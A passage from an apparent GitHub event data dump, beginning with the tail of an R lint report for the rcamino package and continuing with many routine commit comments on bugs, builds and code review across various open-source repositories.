^\n```\n[R/camino_voxelclassify.R:75:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = collapse_opts(opts)\n       ^\n```\n[R/camino_voxelclassify.R:77:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L77) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = camino_cmd(\"voxelclassify\")\n      ^\n```\n[R/camino_voxelclassify.R:78:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L78) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste(cmd, opts)\n      ^\n```\n[R/camino_voxelclassify.R:82:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L82) *style:* **Use <-, not =, for assignment.**\n```r\n​  cmd = paste0(cmd, \" > \", outfile)\n      ^\n```\n[R/camino_voxelclassify.R:83:3:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L83) *warning:* **local variable ‘res’ assigned but may not be used**\n```r\n​  res = system(cmd)\n  ^~~\n```\n[R/camino_voxelclassify.R:83:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/camino_voxelclassify.R#L83) *style:* **Use <-, not =, for assignment.**\n```r\n​  res = system(cmd)\n      ^\n```\n[R/collapse_opts.R:8:15:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/collapse_opts.R#L8) *style:* **Use <-, not =, for assignment.**\n```r\n​collapse_opts = function(opts) {\n              ^\n```\n[R/collapse_opts.R:9:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/collapse_opts.R#L9) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = paste(names(opts), opts, collapse = \" \")\n       ^\n```\n[R/collapse_opts.R:19:19:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/collapse_opts.R#L19) *style:* **Use <-, not =, for assignment.**\n```r\n​collapse_log_opts = function(opts) {\n                  ^\n```\n[R/collapse_opts.R:20:5:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/collapse_opts.R#L20) *style:* **Use <-, not =, for assignment.**\n```r\n​  n = names(opts)\n    ^\n```\n[R/collapse_opts.R:21:8:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/collapse_opts.R#L21) *style:* **Use <-, not =, for assignment.**\n```r\n​  opts = as.logical(opts)\n       ^\n```\n[R/collapse_opts.R:22:5:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/collapse_opts.R#L22) *style:* **Use <-, not =, for assignment.**\n```r\n​  n = n[ opts ]\n    ^\n```\n[R/collapse_opts.R:24:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/collapse_opts.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​    opts = paste(n, collapse = \" \")\n         ^\n```\n[R/collapse_opts.R:26:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/collapse_opts.R#L26) *style:* **Use <-, not =, for assignment.**\n```r\n​    opts = \"\"\n         ^\n```\n[R/parse_camino_args.R:9:19:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L9) *style:* **Use <-, not =, for assignment.**\n```r\n​parse_camino_args = function(funcname){\n                  ^\n```\n[R/parse_camino_args.R:10:7:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  vec = read_camino_helpfile(funcname)\n      ^\n```\n[R/parse_camino_args.R:12:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L12) *style:* **Use <-, not =, for assignment.**\n```r\n​    ind1 = grep(\".SH SYNOPSIS\", vec, fixed = TRUE)\n         ^\n```\n[R/parse_camino_args.R:13:12:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L13) *style:* **Use <-, not =, for assignment.**\n```r\n​    ind_ex = grep(\".SH EXAMPLES\", vec, fixed = TRUE)\n           ^\n```\n[R/parse_camino_args.R:14:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​    ind2 = grep(\".SH DESCRIPTION\", vec, fixed = TRUE)\n         ^\n```\n[R/parse_camino_args.R:15:10:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L15) *style:* **Use <-, not =, for assignment.**\n```r\n​    ind2 = min(ind_ex, ind2)\n         ^\n```\n[R/parse_camino_args.R:16:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L16) *style:* **Use <-, not =, for assignment.**\n```r\n​    vec = vec[seq(ind1 + 1, ind2 - 1)]\n        ^\n```\n[R/parse_camino_args.R:17:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L17) *style:* **Use <-, not =, for assignment.**\n```r\n​    vec = vec[ vec != \"\" ]\n        ^\n```\n[R/parse_camino_args.R:18:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L18) *style:* **Use <-, not =, for assignment.**\n```r\n​    vec = vec[ grep(paste0(\"^[.]B \", funcname, \"$\"),\n        ^\n```\n[R/parse_camino_args.R:20:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L20) *style:* **Use <-, not =, for assignment.**\n```r\n​    vec = gsub(\"\\\\\\\\f[I|R|B]\", \"\", vec)\n        ^\n```\n[R/parse_camino_args.R:20:17:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L20) *warning:* **Do not use absolute paths.**\n```r\n​    vec = gsub(\"\\\\\\\\f[I|R|B]\", \"\", vec)\n                ^~~~~~~~~~~~\n```\n[R/parse_camino_args.R:21:9:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L21) *style:* **Use <-, not =, for assignment.**\n```r\n​    vec = gsub(\"\\\\\\\\-\", \"-\", vec)\n        ^\n```\n[R/parse_camino_args.R:21:17:](https://github.com/muschellij2/rcamino/blob/26aefe3ca9c7a64e96df78c679ac3eba3e8f71f7/R/parse_camino_args.R#L21) *warning:* **Do not use absolute paths.**\n```r\n​    vec = gsub(\"\\\\\\\\-\", \"-\", vec)\n                ^~~~~\n```"}},"created_at":"2016-09-26T20:13:26Z"}
{"id":"4620158467","type":"CommitCommentEvent","actor":{"login":"kageiit"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":19179058,"position":null,"line":null,"path":null,"commit_id":"ca49d538d93491020b28b44b6969b25b25e9ccdb","created_at":"2016-09-26T20:15:00Z","updated_at":"2016-09-26T20:15:00Z","body":"@k21 I dont think this maybe accurate. With `resource_union` on, the dummy R can have values that are used by other libraries that depend on an android library target. Also, what about the build config class etc?"}},"created_at":"2016-09-26T20:15:00Z"}
{"id":"4620158742","type":"CommitCommentEvent","actor":{"login":"Kojoley"},"repo":{"name":"matplotlib/matplotlib"},"payload":{"comment":{"id":19179059,"position":32,"line":3389,"path":"lib/matplotlib/axes/_axes.py","commit_id":"79e854f7fe25b5aae3819f8d268c63bf9579d630","created_at":"2016-09-26T20:15:04Z","updated_at":"2016-09-26T20:15:04Z","body":"Will not work as expected if passed `zorder` is 0"}},"created_at":"2016-09-26T20:15:04Z"}
{"id":"4620164253","type":"CommitCommentEvent","actor":{"login":"Hulegal"},"repo":{"name":"onetimesecret/onetimesecret"},"payload":{"comment":{"id":19179068,"position":7,"line":8,"path":"templates/email/secret_link.mustache","commit_id":"7dd6c66d8ba6a152bb5ab423570584859322daaa","created_at":"2016-09-26T20:16:03Z","updated_at":"2016-09-26T20:16:03Z","body":"Ааа?\r\n"}},"created_at":"2016-09-26T20:16:03Z"}
{"id":"4620169247","type":"CommitCommentEvent","actor":{"login":"fscottfoti"},"repo":{"name":"MetropolitanTransportationCommission/bayarea_urbansim"},"payload":{"comment":{"id":19179095,"position":null,"line":null,"path":null,"commit_id":"a5b34abab02c18b6041b1e8a077518ce93bce087","created_at":"2016-09-26T20:16:58Z","updated_at":"2016-09-26T20:16:58Z","body":"@mkreilly this was our bug.  Basically once you have a dataframe with an index, you can't add to that index without a `reindex`.  Here is a tiny example illustrating that problem.  I could have expected it to add the index 'C' in the 2nd step.\r\n\r\n```python\r\nIn [1]: df = pd.DataFrame(index=['A', 'B'])\r\n\r\nIn [2]: df\r\nOut[2]: \r\nEmpty DataFrame\r\nColumns: []\r\nIndex: [A, B]\r\n\r\nIn [3]: df[\"col1\"] = pd.Series([1, 2, 3], index=['A', 'B', 'C'])\r\n\r\nIn [4]: df\r\nOut[4]: \r\n   col1\r\nA     1\r\nB     2\r\n\r\nIn [5]: \r\n```"}},"created_at":"2016-09-26T20:16:58Z"}
{"id":"4620169753","type":"CommitCommentEvent","actor":{"login":"smcv"},"repo":{"name":"JACoders/OpenJK"},"payload":{"comment":{"id":19179096,"position":null,"line":null,"path":null,"commit_id":"8ea096c529c525db3bd2babe3c1a9cc0e230e58d","created_at":"2016-09-26T20:17:03Z","updated_at":"2016-09-26T20:17:03Z","body":"https://msdn.microsoft.com/en-us/library/56e442dc.aspx says it is."}},"created_at":"2016-09-26T20:17:03Z"}
{"id":"4620172742","type":"CommitCommentEvent","actor":{"login":"edtorba"},"repo":{"name":"cwhite92/serverless-twitter-username-bot"},"payload":{"comment":{"id":19179104,"position":null,"line":null,"path":null,"commit_id":"4228cf8c6ee8ad4280e494a577a2dedac604fcca","created_at":"2016-09-26T20:17:35Z","updated_at":"2016-09-26T20:17:35Z","body":"Strong commit name 👍 "}},"created_at":"2016-09-26T20:17:35Z"}
{"id":"4620173226","type":"CommitCommentEvent","actor":{"login":"eberlitz"},"repo":{"name":"eberlitz/splashicon-generator"},"payload":{"comment":{"id":19179106,"position":null,"line":null,"path":null,"commit_id":"7aa8f2f9c330bc5e0a8bcd41bafe5217677e1f61","created_at":"2016-09-26T20:17:40Z","updated_at":"2016-09-26T20:17:40Z","body":"Already did it."}},"created_at":"2016-09-26T20:17:40Z"}
{"id":"4620174582","type":"CommitCommentEvent","actor":{"login":"BubnovArtem"},"repo":{"name":"BubnovArtem/Bubnov-Artem-home-work"},"payload":{"comment":{"id":19179110,"position":null,"line":null,"path":null,"commit_id":"5000dab88c86c7a472b4242ccc245d7b3676b8b6","created_at":"2016-09-26T20:17:55Z","updated_at":"2016-09-26T20:17:55Z","body":"tag #1"}},"created_at":"2016-09-26T20:17:55Z"}
{"id":"4620179276","type":"CommitCommentEvent","actor":{"login":"sapegin"},"repo":{"name":"sapegin/react-styleguidist"},"payload":{"comment":{"id":19179122,"position":6,"line":6,"path":"src/utils/markdown-to-jsx.js","commit_id":"f7401bcd4c18eabe643d005aa6421319e69016cd","created_at":"2016-09-26T20:18:49Z","updated_at":"2016-09-26T20:18:49Z","body":"Cool, thanks!"}},"created_at":"2016-09-26T20:18:49Z"}
{"id":"4620179656","type":"CommitCommentEvent","actor":{"login":"mwhudson"},"repo":{"name":"CanonicalLtd/subiquity"},"payload":{"comment":{"id":19179124,"position":5,"line":674,"path":"subiquitycore/models/network.py","commit_id":"ba51edff75cd60641d9796ada5c4187c58b9f6fb","created_at":"2016-09-26T20:18:53Z","updated_at":"2016-09-26T20:18:53Z","body":"I just meant excluding in Networkdev.render vs excluding in\nNetworkModel.render, sorry. The behaviour makes sense!\n\nOn 27 September 2016 at 05:26, Mathieu Trudel-Lapierre <\nnotifications@github.com> wrote:\n\n> I think we need both. It is possible (at least on my test system), to have\n> the ESSID configured, but no IP addresses set. This is effectively a \"do\n> not configure\", as we hit \"Do not configure\" for the IPv4 and IPv6 settings.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/CanonicalLtd/subiquity/commit/ba51edff75cd60641d9796ada5c4187c58b9f6fb#commitcomment-19175243>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AApBFlmprsqqcdm1TXQ1f5ppbsIlGN-6ks5qt_I7gaJpZM4KGAvc>\n> .\n>\n"}},"created_at":"2016-09-26T20:18:53Z"}
{"id":"4620180241","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19179129,"position":null,"line":null,"path":null,"commit_id":"d80a81ae66911f54a382438efa47d1b1771a29d1","created_at":"2016-09-26T20:19:01Z","updated_at":"2016-09-26T20:19:01Z","body":"Hi Omar, could you please be more specific and file an issue?"}},"created_at":"2016-09-26T20:19:01Z"}
{"id":"4620183819","type":"CommitCommentEvent","actor":{"login":"EECOLOR"},"repo":{"name":"tc39/proposals"},"payload":{"comment":{"id":19179136,"position":4,"line":18,"path":"README.md","commit_id":"f51e3f5a9d36b8aefec26e7a1678d5824085e97d","created_at":"2016-09-26T20:19:39Z","updated_at":"2016-09-26T20:19:39Z","body":"At the readme of the proposal it states it's at stage 1. Not sure if this is incorrect or the other README"}},"created_at":"2016-09-26T20:19:39Z"}
{"id":"4620184724","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19179142,"position":null,"line":null,"path":null,"commit_id":"211bb957b88697b32b95b23f72f1a1db53fafdb0","created_at":"2016-09-26T20:19:50Z","updated_at":"2016-09-26T20:19:50Z","body":"PIK is available in the snapshot builds. Just follow the IBK tutorials."}},"created_at":"2016-09-26T20:19:50Z"}
{"id":"4620185911","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-1-arnoBruynseels"},"payload":{"comment":{"id":19179146,"position":null,"line":null,"path":null,"commit_id":"560f7e7f30d9947001e4238e7784ef975478a7fb","created_at":"2016-09-26T20:20:04Z","updated_at":"2016-09-26T20:20:04Z","body":"That's coo'. Just wondering."}},"created_at":"2016-09-26T20:20:04Z"}
{"id":"4620190120","type":"CommitCommentEvent","actor":{"login":"magicrub"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":19179163,"position":null,"line":null,"path":null,"commit_id":"99d48d8bbda14f60428863ceea8e15de6f7ab73b","created_at":"2016-09-26T20:20:46Z","updated_at":"2016-09-26T20:20:46Z","body":"this commit somehow dragged in some whitespace from a previous commit. Edit the URL to have ?w=1 at the end and it will remove the whitespace and it will then become a 3 line non-functional change."}},"created_at":"2016-09-26T20:20:46Z"}
{"id":"4620195281","type":"CommitCommentEvent","actor":{"login":"kylecesmat"},"repo":{"name":"FormidableLabs/formidable-playbook-docs"},"payload":{"comment":{"id":19179175,"position":null,"line":null,"path":null,"commit_id":"6efbc8f4577aedd84d3b7b7ff193b48ed2755d7e","created_at":"2016-09-26T20:21:41Z","updated_at":"2016-09-26T20:21:41Z","body":"@ebrillhart you can go to https://travis-ci.com and \"rebuild\" the latest build - that should work for redeploying I think. Or there could be a changelog in this repo? Something to where it's not too arbitrary of a commit? "}},"created_at":"2016-09-26T20:21:41Z"}
{"id":"4620198773","type":"CommitCommentEvent","actor":{"login":"mike-teehan"},"repo":{"name":"Sunderland93/ffmpeg-nvenc"},"payload":{"comment":{"id":19179186,"position":null,"line":null,"path":null,"commit_id":"a7673ae6898da595460280dedd4d07ed5df2a9ed","created_at":"2016-09-26T20:22:19Z","updated_at":"2016-09-26T20:22:19Z","body":"Don't contribute to someone else's project. Fork it and claim glory for yourself!\r\n\r\n@strycore - Just jack his code back. Consider this a reverse PR."}},"created_at":"2016-09-26T20:22:19Z"}
{"id":"4620201899","type":"CommitCommentEvent","actor":{"login":"rrccookimo"},"repo":{"name":"fsit02/hw-html-table-rrccookimo"},"payload":{"comment":{"id":19179193,"position":null,"line":null,"path":null,"commit_id":"c74ec3612a2aadbf380ed6ebeb7014f27ed2ee0e","created_at":"2016-09-26T20:22:55Z","updated_at":"2016-09-26T20:22:55Z","body":"林義翔"}},"created_at":"2016-09-26T20:22:55Z"}
{"id":"4620205924","type":"CommitCommentEvent","actor":{"login":"bkandel"},"repo":{"name":"stnava/ANTsR"},"payload":{"comment":{"id":19179207,"position":null,"line":null,"path":null,"commit_id":"63db009342924b41f7b870f64133f2a753e330ce","created_at":"2016-09-26T20:23:39Z","updated_at":"2016-09-26T20:23:39Z","body":"thanks -- looking at the original code it looks like it could use some massaging and tests. i'll see what i can do to make this a little easier to work with. would be great to deprecate the PatchAnalysis repo and redirect here once it's well integrated into ANTsR."}},"created_at":"2016-09-26T20:23:39Z"}
{"id":"4620207565","type":"CommitCommentEvent","actor":{"login":"keithf4"},"repo":{"name":"saaros/pg_partman"},"payload":{"comment":{"id":19179212,"position":null,"line":null,"path":null,"commit_id":"5f0ae0c9c298b9d149f29bbaddda6c995d9c7653","created_at":"2016-09-26T20:23:56Z","updated_at":"2016-09-26T20:23:56Z","body":"So, talk about some ubiquitous timing... I decided to browse through people who'd forked pg_partman and see what's out there. I came across this fix and it may be relevant to another issue I'm having. The BGW doesn't seem to work properly in 9.6rc1. It was seeming to start up in a loop a few times then crash and try again. I'd originally thought it was a bug since it doesn't seem to happen in 9.4 or 9.5 and reported it as such, but only got one response that isn't very conclusive yet either.\r\n\r\nhttps://www.postgresql.org/message-id/CAG1_KcBqvS5dqqKdZYDUf%2BEX3VqQMfnEFMfkO6cHS9dZ79im%3Dw%40mail.gmail.com\r\n\r\nRemoving the `continue` as you did here stopped it from crashing, but now it seems to be stuck in the original loop and not exiting. I'm just starting to dig deeper into the underlying cause now, but figured I'd respond here and see if you wouldn't mind taking a look as well since you seem better with C than me. :)"}},"created_at":"2016-09-26T20:23:56Z"}
{"id":"4620209754","type":"CommitCommentEvent","actor":{"login":"MarcHolness"},"repo":{"name":"MarcHolness/yang"},"payload":{"comment":{"id":19179221,"position":null,"line":null,"path":null,"commit_id":"c546a818355934125caa2c38b7bf17116268d9b1","created_at":"2016-09-26T20:24:20Z","updated_at":"2016-09-26T20:24:20Z","body":"Made updates to 802.1Q types 802.1X YANG modules. Also introduced draft 802.1AX (Link Aggregation) YANG module as part of work being done within IEEE 802.1 WG.\r\n\r\n\r\nmholness@ONW-MHOLNESS-02 ~/Documents/GitHub/yang/standard/ieee/802.1/draft (YangModels/master)\r\n$ pwd\r\n/c/Users/mholness/Documents/GitHub/yang/standard/ieee/802.1/draft\r\n\r\nmholness@ONW-MHOLNESS-02 ~/Documents/GitHub/yang/standard/ieee/802.1/draft (YangModels/master)\r\n$ ls\r\nREADME.txt                ieee802-dot1q-bridge.yang  ieee802-dot1q-tpmr.tree   ieee802-dot1q-vlan-bridge.tree  ieee802-dot1x.yang\r\nieee802-dot1-bridge.tree  ieee802-dot1q-pb.tree      ieee802-dot1q-tpmr.yang   ieee802-dot1q-vlan-bridge.yang\r\nieee802-dot1ax.yang       ieee802-dot1q-pb.yang      ieee802-dot1q-types.yang  ieee802-dot1x.tree\r\n\r\nmholness@ONW-MHOLNESS-02 ~/Documents/GitHub/yang/standard/ieee/802.1/draft (YangModels/master)\r\n$ pyang --ietf -p ../../../ietf/RFC:../../draft ieee802-dot1ax.yang\r\nieee802-dot1ax.yang:3: warning: IETF rule (RFC 6087: 4.8): namespace value should be \"urn:ietf:params:xml:ns:yang:ieee802-dot1ax\"\r\n\r\nmholness@ONW-MHOLNESS-02 ~/Documents/GitHub/yang/standard/ieee/802.1/draft (YangModels/master)\r\n$ pyang --ietf -p ../../../ietf/RFC:../../draft ieee802-dot1q-types.yang\r\nieee802-dot1q-types.yang:3: warning: IETF rule (RFC 6087: 4.8): namespace value should be \"urn:ietf:params:xml:ns:yang:ieee802-dot\r\n1q-types\"\r\n\r\nmholness@ONW-MHOLNESS-02 ~/Documents/GitHub/yang/standard/ieee/802.1/draft (YangModels/master)\r\n$ pyang --ietf -p ../../../ietf/RFC:../../draft ieee802-dot1x.yang\r\nieee802-dot1x.yang:3: warning: IETF rule (RFC 6087: 4.8): namespace value should be \"urn:ietf:params:xml:ns:yang:ieee802-dot1x\""}},"created_at":"2016-09-26T20:24:20Z"}
{"id":"4620213811","type":"CommitCommentEvent","actor":{"login":"z3cka"},"repo":{"name":"UCLALibrary/libraryweb-site"},"payload":{"comment":{"id":19179229,"position":15,"line":15,"path":"www/sites/all/modules/features/uclalib_bookplates/uclalib_bookplates.features.fe_block_settings.inc","commit_id":"b559d948b52b5e31570a47f6c6d2eb409e239187","created_at":"2016-09-26T20:25:05Z","updated_at":"2016-09-26T20:25:05Z","body":"this was added here to master branch"}},"created_at":"2016-09-26T20:25:05Z"}
{"id":"4620215977","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"tc39/proposals"},"payload":{"comment":{"id":19179241,"position":4,"line":18,"path":"README.md","commit_id":"f51e3f5a9d36b8aefec26e7a1678d5824085e97d","created_at":"2016-09-26T20:25:28Z","updated_at":"2016-09-26T20:25:28Z","body":"This repo is the source of truth for stages. The readme needs updating."}},"created_at":"2016-09-26T20:25:28Z"}
{"id":"4620216233","type":"CommitCommentEvent","actor":{"login":"z3cka"},"repo":{"name":"UCLALibrary/libraryweb-site"},"payload":{"comment":{"id":19179242,"position":4,"line":15,"path":"www/sites/all/modules/features/uclalib_bookplates/uclalib_bookplates.features.fe_block_settings.inc","commit_id":"79a9e0ba7832dba36d0bf4f349b62ab109b80270","created_at":"2016-09-26T20:25:30Z","updated_at":"2016-09-26T20:25:30Z","body":"then was removed here on master branch... "}},"created_at":"2016-09-26T20:25:30Z"}
{"id":"4620218149","type":"CommitCommentEvent","actor":{"login":"FrolovVladimir"},"repo":{"name":"FrolovVladimir/YandexTestTask"},"payload":{"comment":{"id":19179249,"position":3,"line":3,"path":".idea/libraries/Maven__junit_junit_4_12.xml","commit_id":"12cdf913400f24961af334258f69fe0d59a7dd2a","created_at":"2016-09-26T20:25:51Z","updated_at":"2016-09-26T20:25:51Z","body":"test"}},"created_at":"2016-09-26T20:25:51Z"}
{"id":"4620218514","type":"CommitCommentEvent","actor":{"login":"paulathevalley"},"repo":{"name":"FormidableLabs/formidable-playbook-docs"},"payload":{"comment":{"id":19179252,"position":null,"line":null,"path":null,"commit_id":"6efbc8f4577aedd84d3b7b7ff193b48ed2755d7e","created_at":"2016-09-26T20:25:56Z","updated_at":"2016-09-26T20:25:56Z","body":"https://travis-ci.com is for private repos, so all of our `-docs` repos can be found at https://travis-ci.org ...specifically https://travis-ci.org/profile/FormidableLabs\r\n\r\nI like the idea of hitting \"rebuild\" ...I don’t know if a changelog is necessary.\r\n"}},"created_at":"2016-09-26T20:25:56Z"}
{"id":"4620220147","type":"CommitCommentEvent","actor":{"login":"taschini"},"repo":{"name":"morepath/morepath"},"payload":{"comment":{"id":19179257,"position":null,"line":null,"path":null,"commit_id":"4923f18fc917ba177fbf8e55226f1c8297522e0e","created_at":"2016-09-26T20:26:13Z","updated_at":"2016-09-26T20:26:13Z","body":"This is helpful for those cases in which you use Py.test directly instead of Tox.  If you want you can update tox.ini with something like\r\n\r\n```ini\r\ncommands = py.test --cov --cov-fail-under 100 {posargs}\r\n```\r\nbut I don't mind if you leave it as it is.\r\n\r\nSame with the docs: if you want you can update it to\r\n\r\n```console\r\n$ py.test --cov --cov-report html\r\n```\r\n"}},"created_at":"2016-09-26T20:26:13Z"}
{"id":"4620220612","type":"CommitCommentEvent","actor":{"login":"dataCringe"},"repo":{"name":"dataCringe/Hello-World"},"payload":{"comment":{"id":19179259,"position":null,"line":null,"path":null,"commit_id":"a80949dcf1bf152845f009939c68d8598b598c69","created_at":"2016-09-26T20:26:18Z","updated_at":"2016-09-26T20:26:18Z","body":"\r\n[CIS237C_W4_LAB_RICKY_ESQUIVEL_JR.zip](https://github.com/dataCringe/Hello-World/files/494046/CIS237C_W4_LAB_RICKY_ESQUIVEL_JR.zip)\r\n"}},"created_at":"2016-09-26T20:26:18Z"}
{"id":"4620220944","type":"CommitCommentEvent","actor":{"login":"FrolovVladimir"},"repo":{"name":"FrolovVladimir/YandexTestTask"},"payload":{"comment":{"id":19179262,"position":9,"line":9,"path":".idea/libraries/Maven__org_hamcrest_hamcrest_core_1_3.xml","commit_id":"12cdf913400f24961af334258f69fe0d59a7dd2a","created_at":"2016-09-26T20:26:22Z","updated_at":"2016-09-26T20:26:22Z","body":"test2"}},"created_at":"2016-09-26T20:26:22Z"}
{"id":"4620224039","type":"CommitCommentEvent","actor":{"login":"Rustamnurg"},"repo":{"name":"Rustamnurg/HW2Storyboard"},"payload":{"comment":{"id":19179280,"position":null,"line":null,"path":null,"commit_id":"27c99c867babf1f85fbe6032d4b23d90951f2af6","created_at":"2016-09-26T20:26:56Z","updated_at":"2016-09-26T20:26:56Z","body":"123"}},"created_at":"2016-09-26T20:26:56Z"}
{"id":"4620226285","type":"CommitCommentEvent","actor":{"login":"cyphermox"},"repo":{"name":"CanonicalLtd/subiquity"},"payload":{"comment":{"id":19179287,"position":5,"line":674,"path":"subiquitycore/models/network.py","commit_id":"ba51edff75cd60641d9796ada5c4187c58b9f6fb","created_at":"2016-09-26T20:27:18Z","updated_at":"2016-09-26T20:27:18Z","body":"Well, the device already knows what kind it is, so it tends to make sense to do the change there, but I went this way because we might want to actually explicitly describe ethernet devices with an empty set of addresses and dhcp disabled (ie. explicilty not configured) rather than for wifi devices which would be \"implicitly\" unconfigured by way of not having any configuration in the netplan file. It's confusing, but it's because of a limitation in netplan that perhaps ought to be fixed."}},"created_at":"2016-09-26T20:27:18Z"}
{"id":"4620230823","type":"CommitCommentEvent","actor":{"login":"dunse"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":19179300,"position":35,"line":311,"path":"spring-boot/src/test/java/org/springframework/boot/logging/logback/LogbackLoggingSystemTests.java","commit_id":"43361e0ca5180f608513e6f26d29d93c3a40142c","created_at":"2016-09-26T20:28:07Z","updated_at":"2016-09-26T20:28:07Z","body":"By removing his line the test for Issue #5491 is no longer valid.\r\nWhen Spring Cloud is used there is no longer a log file generated as per logging.file in application.properties.\r\nIs there another way to fix issue #6688 than preventing all reinitialization?"}},"created_at":"2016-09-26T20:28:07Z"}
{"id":"4620233691","type":"CommitCommentEvent","actor":{"login":"Jusonex"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":19179305,"position":null,"line":null,"path":null,"commit_id":"6e129960098aad9ea636728b4f749f3b5a5b774d","created_at":"2016-09-26T20:28:39Z","updated_at":"2016-09-26T20:28:39Z","body":"Looks like this:\r\n![alert](https://cloud.githubusercontent.com/assets/4458720/18850602/8af323c8-8438-11e6-976a-708541b052a2.jpg)\r\n"}},"created_at":"2016-09-26T20:28:39Z"}
{"id":"4620234907","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19179307,"position":122,"line":120,"path":"squelette/js/ch04-05_BlueTriangles.js","commit_id":"99f70520a9610459e3e74590a12fd523a0a07952","created_at":"2016-09-26T20:28:53Z","updated_at":"2016-09-26T20:28:53Z","body":"s/change/toggle/\r\n\r\n`withPerspective = !withPerspective+0`\r\n\r\nPS: I like the fact that you don't put a `;` on the last expression of a block."}},"created_at":"2016-09-26T20:28:53Z"}
{"id":"4620235488","type":"CommitCommentEvent","actor":{"login":"elsupergomez"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19179311,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T20:28:58Z","updated_at":"2016-09-26T20:28:58Z","body":"Thanks for response.\r\nI use official Fedora package\r\ngtk-sharp3.x86_64            2.99.3-15.fc24\r\ngtk3.x86_64                          3.20.9-1.fc24\r\n\r\nThis is the out when click in Label example and crash:\r\n\r\nLoaded assembly: /data/git/xwt/TestApps/Gtk3Test/bin/Debug/Gtk3Test.exe\r\nLoaded assembly: /data/git/xwt/TestApps/Gtk3Test/bin/Debug/Samples.dll\r\nLoaded assembly: /data/git/xwt/TestApps/Gtk3Test/bin/Debug/Xwt.dll\r\nLoaded assembly: /usr/lib/mono/gac/System/4.0.0.0__b77a5c561934e089/System.dll [External]\r\nLoaded assembly: /usr/lib/mono/gac/System.Core/4.0.0.0__b77a5c561934e089/System.Core.dll [External]\r\nLoaded assembly: /data/git/xwt/TestApps/Gtk3Test/bin/Debug/Xwt.Gtk3.dll\r\nLoaded assembly: /usr/lib/mono/gac/gtk-sharp/3.0.0.0__35e10195dab3c99f/gtk-sharp.dll [External]\r\nLoaded assembly: /usr/lib/mono/gac/gio-sharp/3.0.0.0__35e10195dab3c99f/gio-sharp.dll [External]\r\nLoaded assembly: 